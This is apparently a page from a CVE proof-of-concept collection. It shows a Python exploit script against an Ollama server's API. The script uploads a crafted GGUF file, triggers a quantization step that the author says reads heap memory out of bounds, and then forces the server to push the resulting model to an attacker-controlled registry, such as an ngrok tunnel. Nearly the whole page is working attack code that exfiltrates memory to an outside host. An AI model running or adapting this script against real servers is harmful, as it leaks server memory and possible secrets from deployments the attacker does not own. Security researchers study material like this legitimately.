5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
import requests
import hashlib
import sys
import os

# Set NO_PROXY to "*" for this process before any request is made.
# NOTE(review): presumably so the HTTP calls below bypass any proxy configured
# in the environment — confirm against the requests proxy documentation.
os.environ["NO_PROXY"] = "*"

# Configuration
# Base URL of the Ollama HTTP API the script talks to; override with the
# TARGET_URL environment variable.
TARGET_URL = os.getenv("TARGET_URL", "http://localhost:11434")
# Path of the GGUF file that exploit() hashes and uploads. It is not created
# by this script; exploit() exits if the file is missing.
GGUF_FILE = "malicious.gguf"
# Registry prefix used to build the model name that is created and pushed;
# override with the EXFIL_REGISTRY environment variable.
# Original author's note: do not include a ":port" suffix, otherwise Windows
# will fail to create the directory because of the colon. Use an HTTP ngrok
# tunnel (e.g., something.ngrok-free.app) or an IP hosting on port 80.
EXFIL_REGISTRY = os.getenv("EXFIL_REGISTRY", "http://localhost")

def get_sha256(filepath):
    """Return the hex-encoded SHA-256 digest of the file at *filepath*.

    The file is opened in binary mode and consumed in 4096-byte chunks, so
    the whole file is never held in memory at once. Any error raised by
    ``open`` or ``read`` propagates to the caller.
    """
    digest = hashlib.sha256()
    with open(filepath, "rb") as stream:
        while True:
            chunk = stream.read(4096)
            # An empty bytes object signals end of file.
            if not chunk:
                break
            digest.update(chunk)
    return digest.hexdigest()

def exploit(iter_num=0):
    """Run one upload / create / push sequence against the Ollama API at TARGET_URL.

    This is proof-of-concept code: run it only against systems you own or are
    explicitly authorized to test.

    Steps, in order:
      1. Verify GGUF_FILE exists and compute its SHA-256.
      2. HEAD, then POST the file to ``/api/blobs/sha256:<hash>``.
      3. POST to ``/api/create`` asking for a model built from that blob with
         ``Q4_K_M`` quantization.
      4. POST to ``/api/push`` for the same model name with ``insecure`` set.

    Args:
        iter_num: Value appended to the model name so each call uses a
            distinct name (the original author's stated reason is to bypass
            caching).

    Returns:
        None.

    Exits:
        Calls ``sys.exit(1)`` if GGUF_FILE is missing, if the blob upload
        does not return 200/201, or if the create call does not return 200.
        A failed push is only printed; the function then returns normally.

    NOTE(review): the printed messages about what the server has captured or
    pushed reflect the original author's claims. This function only checks
    HTTP status codes and does not verify those outcomes.
    """
    if not os.path.exists(GGUF_FILE):
        print(f"[-] {GGUF_FILE} not found. Run the forge script first.")
        sys.exit(1)

    # Use unique model name per iteration to bypass cache
    model_name = f"{EXFIL_REGISTRY}/attacker/leak_model_{iter_num}"

    print(f"\n[*] --- Exfiltration Iteration {iter_num} ---")
    print(f"[*] Target Ollama: {TARGET_URL}")
    print(f"[*] Exfil Registry: {EXFIL_REGISTRY}")
    
    # The digest is used both in the blob URL and in the create payload.
    file_hash = get_sha256(GGUF_FILE)
    print(f"[*] Payload SHA256: {file_hash}")

    # Stage 1: Upload the malicious blob
    print("[*] Stage 1: Uploading malicious blob...")
    with open(GGUF_FILE, "rb") as f:
        blob_url = f"{TARGET_URL}/api/blobs/sha256:{file_hash}"
        # We do a HEAD request first as Ollama sometimes requires it to initialize the upload stream
        # (original author's claim). The HEAD response is discarded, not inspected.
        requests.head(blob_url) 
        # The open file object is passed as the request body.
        res = requests.post(blob_url, data=f)
        if res.status_code not in (200, 201):
            print(f"[-] Blob upload failed: {res.text}")
            sys.exit(1)
        print("[+] Blob uploaded successfully.")

    # Stage 2: Trigger Out-of-Bounds Read (Quantization)
    print(f"[*] Stage 2: Triggering quantization memory corruption...")

    # JSON body for /api/create: build model_name from the uploaded blob and
    # request Q4_K_M quantization, with a single non-streamed response.
    create_payload = {
        "model": model_name,
        "modelfile": "FROM malicious.gguf\n",  # The actual Modelfile instruction
        "files": {
            "malicious.gguf": f"sha256:{file_hash}"  # Maps the instruction to our blob
        },
        "quantize": "Q4_K_M",
        "stream": False
    }


    
    res = requests.post(f"{TARGET_URL}/api/create", json=create_payload)
    if res.status_code != 200:
        print(f"[-] Exploit failed during creation: {res.text}")
        sys.exit(1)
    
    print("[+] Model created! Heap memory has been successfully captured into the artifact.")

    # Stage 3: Exfiltrate the memory
    print(f"[*] Stage 3: Forcing server to push leaked memory to our registry...")
    # JSON body for /api/push: push the model created above under the same name.
    push_payload = {
        "name": model_name,
        "insecure": True, # Required to push to our unencrypted HTTP Docker registry
        "stream": False
    }
    
    res = requests.post(f"{TARGET_URL}/api/push", json=push_payload)
    # Unlike the earlier stages, a non-200 response here does not exit the
    # process; the failure text is printed and the function returns.
    if res.status_code == 200:
        print("[+] ==================================================")
        print("[+] EXFILTRATION COMPLETE!")
        print(f"[+] The server's heap memory has been pushed to {EXFIL_REGISTRY}")
        print("[+] ==================================================")
    else:
        print(f"[-] Push failed: {res.text}")

if __name__ == "__main__":
    # Script entry point: call exploit() once per iteration, passing the loop
    # index so every run uses a distinct model name.
    import time
    iterations = 1  # Number of iterations to run
    for i in range(iterations):
        exploit(i)
        # Sleep between runs, but not after the last one.
        if i < iterations - 1:
            print("[*] Waiting 2 seconds before next exfiltration...")
            time.sleep(2)
            
    # Printed whenever the loop finishes, including when exploit() reported a
    # failed push (that path returns instead of exiting).
    # NOTE(review): extractor.py and the exfils/ directory are not part of this
    # file — presumably companion tooling on the registry side; confirm.
    print("\n[+] All iterations complete. You can now use extractor.py to read exfils/ directory.")